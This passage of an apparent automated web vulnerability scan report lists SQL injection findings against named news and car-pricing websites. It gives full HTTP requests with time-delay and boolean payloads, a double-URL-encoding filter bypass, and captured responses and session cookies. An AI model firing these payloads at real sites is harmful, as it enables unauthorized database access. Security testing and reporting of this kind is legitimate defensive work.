csi2=3137272.js^3^1291762416^1291762420&3181577.js^1^1291762417^1291762417&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; cd=false; dq=13|1|12|0

Response 1

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:34 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 08-Dec-2011 00:32:34 GMT; Path=/
Set-Cookie: dq=14|1|13|0; Expires=Thu, 08-Dec-2011 00:32:34 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

Request 2

GET /oz/sensor?p=rubicon&pc=5833/7750&cd=false&xt=31&k=mercury+news:176,san+jose:160,news:158,rss+feed:136,rss+feeds:128,mercury+new:88,rss+san:80,columns:80,jose+mercury:80,special+reports:80,new:79,rss+terms:64,life+style:64,find+us:64,local+news:64,news+video:64,food+dining:64,video:64,sports+video:64,entertainment+video:64,company+news:64,mobile+device:64,college+teams:64,follow+us:64,business+video:64,opinion+editorial:64,feed:59,sports:48,twitter:48,mercury:44,jose:40,real+simple:40,syndicate+feeds:40,business:40,column:40,simple+syndicate:40,rss+real:40,news+rss:40,feeds:34,access:32,&t=RSS+-+San+Jose+Mercury+News HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/rss
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GF2RE1HF-38CG-10.244.194.4; put_1197=3139581898413592329; put_2081=CC-00000000320688809; put_1512=%5Bnil%5D; put_1994=13371vxjy3fi8; put_1430=31057e0c-a620-4881-8978-76fc8986a66d; put_1986=1253520181866309356; put_1185=9222939536171538409; csi15=667425.js^1^1291409956^1291409956&3177143.js^1^1291409955^1291409955&3183677.js^2^1291409480^1291409485; ruid=254cb0a61dae79de123c116f^6^1291762372^2927222290; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLWUZj+18GyLPZWNJJs7VW/GiUFnXQJ; khaos=GFEPV6UK-2-91QT; rpb=4214%3D1%265671%3D1%264210%3D1%264222%3D1%264554%3D1%264894%3D1%264212%3D1%265446%3D1%262372%3D1'%20and%201%3d2--%20; rdk9=1; csi9=441746.js^2^1291762415^1291762418&3181771.js^1^1291762417^1291762417&3172324.js^2^1291762387^1291762395; rdk=5833/7750; rdk2=0; csi2=3137272.js^3^1291762416^1291762420&3181577.js^1^1291762417^1291762417&3172323.js^1^1291762415^1291762415&2617282.js^2^1291762395^1291762401&441745.js^3^1291762372^1291762390; cd=false; dq=13|1|12|0

Response 2

HTTP/1.1 204 No Content
Date: Wed, 08 Dec 2010 00:32:34 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Cache-control: private
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


1.129. http://www.bkrtx.com/js/bk-static.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bkrtx.com
Path:   /js/bk-static.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 35022 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /js'waitfor%20delay'0%3a0%3a20'--/bk-static.js HTTP/1.1
Host: www.bkrtx.com
Proxy-Connection: keep-alive
Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 504 Gateway Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 175
Cache-Control: max-age=86400
Date: Wed, 08 Dec 2010 01:36:22 GMT
Connection: close

<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY>
An error occurred while processing your request.<p>
Reference&#32;&#35;97&#46;a675aad1&#46;1291772182&#46;225ed38
</BODY></HTML>

1.130. http://www.bkrtx.com/js/bk-static.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bkrtx.com
Path:   /js/bk-static.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload %2527waitfor%2520delay%25270%253a0%253a20%2527%252d%252d was submitted in the REST URL parameter 2. The application took 34085 milliseconds to respond to the request, compared with 3 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/bk-static.js%2527waitfor%2520delay%25270%253a0%253a20%2527%252d%252d HTTP/1.1
Host: www.bkrtx.com
Proxy-Connection: keep-alive
Referer: http://www.carpricesecrets.com/page_footer_frame.php?vid=1&detid=1002&zip=&make=Mercury&make_id=28&model=&key=New+CPCLogic&body=&msrp=N%2FA&year=&page_category=landing
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 504 Gateway Time-out
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 175
Cache-Control: max-age=86400
Date: Wed, 08 Dec 2010 01:40:56 GMT
Connection: close

<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY>
An error occurred while processing your request.<p>
Reference&#32;&#35;97&#46;a675aad1&#46;1291772456&#46;226aa26
</BODY></HTML>

1.131. http://www.carpricesecrets.com/mercury [t_mtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.carpricesecrets.com
Path:   /mercury

Issue detail

The t_mtype parameter appears to be vulnerable to SQL injection attacks. The payloads 49362984'%20or%201%3d1--%20 and 49362984'%20or%201%3d2--%20 were each submitted in the t_mtype parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c49362984'%20or%201%3d1--%20 HTTP/1.1
Host: www.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:37:30 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: Apache=174.121.222.18.1291768650859840; path=/; expires=Tue, 03-Dec-30 00:37:30 GMT
X-Powered-By: PHP/5.2.10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE"
Set-Cookie: PHPSESSID=04qimd7i4eptlr5qrb61n69d61; path=/; domain=www.carpricesecrets.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:37:30 GMT; path=/; domain=www.carpricesecrets.com
Set-Cookie: landing_id=70445704; expires=Wed, 15-Dec-2010 00:37:30 GMT; path=/; domain=www.carpricesecrets.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27519

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Don't Miss Out on Year End Vehicle Sales!</title>
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Script-Type" content="application/javascript" />
<meta name="description" content="New Vehicle Prices are at an All-Time Low!" />
<meta name="keywords" content="mercury price quotes, mercury prices, new car prices, new car pricing" />
<link rel="shortcut icon" href="http://images.carpricesecrets.com/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="http://images.carpricesecrets.com/css/reset.css" />
<link rel="stylesheet" type="text/css" href="http://images.carpricesecrets.com/css/nd_032509_mainstyles.css" />

<script language="javascript" type="text/javascript">

if (typeof(Local) === 'undefined') {
var Local = {};
}

</script>


<!-- OPTIMOST PAGE CODE V2.7 - Copyright 2002-2008 Interwoven, Inc. -->
<script language="javascript" type="text/javascript"><!--
var optimost={A:{},C:{},D:document,L:document.location,M:[ ],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cookie;if(s.length>3){for(var a=s.substring(1)
.split("&"),i=0,l=a.length;i<l;i++){var p=a[i].indexOf("=");if(p>0)this.Q[a[i].substring(0,p)]=unescape(a[i].substring(
p+1));}}if(c.length>3){for(var a=c.split(";"),i=0,b=a.length;i<b;i++){var v=a[i].split("=");while(v[0].substring(0,
1)==" ")v[0]=v[0].substring(1,v[0].length);if(v.length==2)this.C[v[0]]=unescape(v[1]);}}},B:function(){var n;this.A={
};var _o=this;this.A.D_ts=Math.round(_o.T.getTime()/1000);this.A.D_tzo=_o.T.getTimezoneOffset();this.A.D_loc=_o.L.protocol+
"//"+_o.L.hostname+_o.L.pathname;this.A.D_ckl=_o.D.cookie.length;this.A.D_ref=_o.D.referrer;if(typeof optrial=="object")
for(n in optrial)this.A[n]=optrial[n];for(n in this.Q)this.A[n]=this.Q[n];for(n in this.C)if(n.substring(0,2)=="op")this.A[n]=
this.C[n];},S:functi
...[SNIP]...

Request 2

GET /mercury?t_se=msn&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c49362984'%20or%201%3d2--%20 HTTP/1.1
Host: www.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:38:18 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: Apache=174.121.222.18.1291768698223179; path=/; expires=Tue, 03-Dec-30 00:38:18 GMT
X-Powered-By: PHP/5.2.10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE"
Set-Cookie: PHPSESSID=eppuftqhqhu6cu3jqgfom8v0e2; path=/; domain=www.carpricesecrets.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:38:18 GMT; path=/; domain=www.carpricesecrets.com
Set-Cookie: landing_id=70445717; expires=Wed, 15-Dec-2010 00:38:18 GMT; path=/; domain=www.carpricesecrets.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27726

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Get the Lowest Mercury Price Quotes at CarPriceSecrets.com</title>
<meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Script-Type" content="application/javascript" />
<meta name="description" content="CarPriceSecrets.com finds the lowest possible Mercury prices at your local Mercury dealers. We also reveal the secrets to negotiating your lowest possible price on a new Mercury. Our service is fast and free." />
<meta name="keywords" content="mercury price quotes, mercury prices, new car prices, new car pricing" />
<link rel="shortcut icon" href="http://images.carpricesecrets.com/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="http://images.carpricesecrets.com/css/reset.css" />
<link rel="stylesheet" type="text/css" href="http://images.carpricesecrets.com/css/nd_032509_mainstyles.css" />

<script language="javascript" type="text/javascript">

if (typeof(Local) === 'undefined') {
var Local = {};
}

</script>


<!-- OPTIMOST PAGE CODE V2.7 - Copyright 2002-2008 Interwoven, Inc. -->
<script language="javascript" type="text/javascript"><!--
var optimost={A:{},C:{},D:document,L:document.location,M:[ ],Q:{},T:new Date(),U:'',V:'2.7',Enabled:true,ST:"script",SA:
{"type":"text/javascript"},I:function(){var s=this.L.search;var c=this.D.cookie;if(s.length>3){for(var a=s.substring(1)
.split("&"),i=0,l=a.length;i<l;i++){var p=a[i].indexOf("=");if(p>0)this.Q[a[i].substring(0,p)]=unescape(a[i].substring(
p+1));}}if(c.length>3){for(var a=c.split(";"),i=0,b=a.length;i<b;i++){var v=a[i].split("=");while(v[0].substring(0,
1)==" ")v[0]=v[0].substring(1,v[0].length);if(v.length==2)this.C[v[0]]=unescape(v[1]);}}},B:function(){var n;this.A={
};var _o=this;this.A.D_ts=Math.round(_o.T.getTime()/1000);this.A.D_tzo=_o.T.getTimezoneOffset();this.A.D_loc=_o.L.protocol+
"//"+_o.L.hostname+_o.L.pathname;this.A.D_ckl=_o.D.cookie.length;this.A.D_ref=_o.D.re
...[SNIP]...

1.132. http://www.contracostatimes.com/california/ci_16783052 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /california/ci_16783052

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 16701620'%20or%201%3d1--%20 and 16701620'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /california/ci_16783052?nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=16701620'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:53:47 GMT
Set-Cookie: JSESSIONID=U3VDF33SPCATACUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The transgender community will have access to a new health clinic specifically designed with their needs in mind. The result of a partnership between Humboldt County transgender advocates and Bay Area agencies, the Humboldt Open Door Clinic is'><meta name="keywords" content="state news california bay area"/><title>Open Door starts Humboldt's first transgender health clinic - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MNGiIDCookieName = "MNGID";
</script><script
...[SNIP]...

Request 2

GET /california/ci_16783052?nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=16701620'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=FR3SDXL4NSFRECUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The transgender community will have access to a new health clinic specifically designed with their needs in mind. The result of a partnership between Humboldt County transgender advocates and Bay Area agencies, the Humboldt Open Door Clinic is'><meta name="keywords" content="state news california bay area"/><title>Open Door starts Humboldt's first transgender health clinic - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MNGiIDCookieName = "MNGID";
</script><script language="JavaScript" type="text/javascript" src="http://extras.mnginteractive.com/li
...[SNIP]...

1.133. http://www.contracostatimes.com/ci_16759989 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16759989

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 94603801'%20or%201%3d1--%20 and 94603801'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16759989?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=94603801'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:53:49 GMT
Set-Cookie: JSESSIONID=CI4FIKSTESBRCCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 69824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='A registered sex offender was arrested on suspicion of raping a 2-year-old girl in a Dollar Tree store as her relatives were Christmas shopping in the next aisle, police said Thursday.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Union City sex offender accused of raping 2-year-old - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript"
...[SNIP]...

Request 2

GET /ci_16759989?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q=94603801'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
